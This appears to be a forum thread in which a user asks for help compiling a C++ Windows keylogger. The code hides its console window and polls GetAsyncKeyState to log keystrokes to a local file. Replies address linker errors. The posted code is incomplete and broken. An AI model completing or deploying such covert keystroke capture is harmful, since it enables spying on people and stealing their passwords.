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Hey I'm having a few problems with my compiler.

I'm using Borland C++BuilderX, and when I compile the following code, I get the errors below:

#include <windows.h>
#include <fstream.h>

using namespace std;

ofstream log;

int main(){

ShowWindow(GetConsoleWindow(), SW_HIDE); //hide console

log.open("log.dat", ios::app); //open log file - append

while(1){ //infinite loop

          for(int keyCode=0;keyCode<255;keyCode++){ //loop through key codes

                  if(GetAsyncKeyState(keyCode)==-32767){ //get key code

                       if(keyCode == 65){
                              log<< "A";
                       else if(keyCode == 66){
                              log<< "B";
                       else if(keyCode == 67){
                              log<< "C";
return 0;


When I compile with Dev-C++ 4 I get errors with "ShowWindow(GetConsoleWindow(), SW_HIDE);":


Other then that it works fine in Dev-C++.

I moved "ofstream log;" into the main function (Borland version), but as soon as It had compiled, it crashed with the "Program Not Responding" error message.

I've done tonnes of Googling and found nothing helpful.

I'd really appreciate any help at all, thanks in advance.


Thanks so much for your help!


Linking with CW32i.LIB resolved "Error: Unresolved external'___CPPdebugHook' referenced from.......", but I'm still getting "Error: Unresolved external'__System__GetTls' referenced from.....". I tried every Library that I got with the Compiler, and have done an excessive amount of googling (even resorted to Yahoo  :-() to no avail.


im not mfc ninja but it says it cant fine the GetConsoleWindow() function. You sure you have declared it properly..spellings etc,,,?

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